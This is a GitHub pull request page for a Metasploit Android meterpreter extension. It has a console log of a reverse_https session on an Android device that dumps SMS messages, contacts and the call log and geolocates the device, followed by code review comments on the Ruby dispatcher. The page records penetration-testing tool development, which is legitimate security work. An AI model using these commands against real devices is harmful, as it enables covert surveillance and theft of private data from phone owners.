Skip to content

Android meterpreter extension #3039

Closed
wants to merge 7 commits into from

5 participants

@AnwarMohamed
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_https
PAYLOAD => android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(handler) > set LPORT 2222
LPORT => 2222
msf exploit(handler) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:2222/
[*] Starting the payload handler...
[*] 10.0.0.101:43620 Request received for /TAvM_4CurVL8LMrbIqy3V...
[*] Meterpreter session 1 opened (10.0.0.1:2222 -> 10.0.0.101:43620) at 2014-02-26 03:56:50 +0200

meterpreter > sysinfo 
Computer    : localhost
OS          : Android 4.1.1 - Linux 3.0.31-302285 (armv7l)
Meterpreter : java/android
meterpreter > help

Android Commands
================

    Command          Description
    -------          -----------
    check_root       Check if device is rooted
    device_shutdown  Shutdown device
    dump_calllog     Get call log
    dump_contacts    Get contacts list
    dump_sms         Get sms messages
    geolocate        Get current lat-long using geolocation


meterpreter > check_root 
[*] Device is rooted
meterpreter > dump_calllog
[] Fetching 164 entries
[] Call log saved to: E:/metasploit/metasploit-framework/dump_calllog_rjOUMFHN.txt

meterpreter > dump_sms
[] Fetching 896 sms messages
[] Sms messages saved to: E:/metasploit/metasploit-framework/sms_dump_JQmaoINw.txt

meterpreter > dump_contacts
[] Fetching 618 contacts into list
[] Contacts list saved to: E:/metasploit/metasploit-framework/contacts_dump_GidUbOsl.txt

meterpreter > geolocate
[*] Current Location:

Latitude  : 31.2186009
Longitude : 29.9448264
meterpreter > exit
@AnwarMohamed

any hopes to merge it soon as I want to add more commands please?

@jvennix-r7

@AnwarMohamed I'll get to this one once your reverse_http_s is landed, hopefully this week. If you want to add more commands, feel free to branch off this branch, and then push the commands up as separate PRs!

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+class Console::CommandDispatcher::Android
+
+ Klass = Console::CommandDispatcher::Android
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

Why is this line here? I don't think Klass is ever referenced

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ )
+
+ dump_calllog_opts.parse( args ) { | opt, idx, val |
+ case opt
+ when "-h"
+ print_line( "Usage: dump_calllog [options]\n" )
+ print_line( "Get call log." )
+ print_line( dump_calllog_opts.usage )
+ return
+ when "-o"
+ path = val
+ end
+ }
+
+ log = Array.new
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

You can delete this line, the Array is discarded on the next line

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+ res = client.android.device_shutdown(seconds)
+
+ if res == true
+ print_status("Device will shutdown #{seconds > 0 ?("after " + seconds + "seconds"):"now"}")
+ else
+ print_error("Device shutdown failed")
+ end
+ end
+
+ def cmd_dump_sms(*args)
+
+ path = "sms_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+ dump_sms_opts = Rex::Parser::Arguments.new(
+ "-h" => [ false, "Help Banner" ],
+ "-o" => [ false, "Output path for sms list"]
+ )
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indenting is off one level here

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+ "geolocate" => [ "geolocate"],
+ "dump_calllog" => [ "dump_calllog"],
+ "check_root" => [ "check_root"],
+ "device_shutdown" => [ "device_shutdown"]
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

This could be a little shorter with Enumberable#any?

all.delete_if do |cmd, desc|
  reqs[cmd].any? { |req| not client.commands.include?(req) }
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ ::File.open( path, 'wb' ) do |fd|
+
+ fd.write("\n=====================\n")
+ fd.write("[+] Sms messages dump\n")
+ fd.write("=====================\n\n")
+
+ time = Time.new
+ fd.write("Date: #{time.inspect}\n")
+ fd.write("OS: #{info['OS']}\n")
+ fd.write("Remote IP: #{client.sock.peerhost}\n")
+ fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+ smsList.each_with_index { |a, index|
+
+ fd.write("##{(index.to_i + 1).to_s()}\n")
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indent level is doubled here

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ ::File.open( path, 'wb' ) do |fd|
+
+ fd.write("\n======================\n")
+ fd.write("[+] Contacts list dump\n")
+ fd.write("======================\n\n")
+
+ time = Time.new
+ fd.write("Date: #{time.inspect}\n")
+ fd.write("OS: #{info['OS']}\n")
+ fd.write("Remote IP: #{client.sock.peerhost}\n")
+ fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+ contactList.each_with_index { |c, index|
+
+ fd.write("##{(index.to_i + 1).to_s()}\n")
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indent level is doubled here as well

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@AnwarMohamed

Hope that this gets merged soon

@infodox
infodox commented Jun 24, 2014

@AnwarMohamed theres a merge conflict, seemingly. You may want to reissue the pull request after getting whatever it is thats conflicting up to date :)

Looks like a fun extension though!

@ajayfuloria

hey @AnwarMohamed
i am up and running with ur android extn, but when i install the apk on the android emulator, it says, unfortunately the com.metasploit.mainactivity got closed. Is the code on git working ? where could i have gone wrong ?
thanks n pls reply

hellpp

@ajayfuloria

@AnwarMohamed , @infodox Help me with executing this extn plss

I cloned the https://github.com/AnwarMohamed/metasploit-framework.git
Then I merged the branch android_extension by "$git branch android_extension master/android_extension"
Then I merged the local branch and android_extension
I got conflict in jar files so I downloaded them from git directly and put them in place.

Is there a neater way to do it ? i am sorry but pls help i am new to git...

Regards,

@AnwarMohamed

please refer to #3501

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.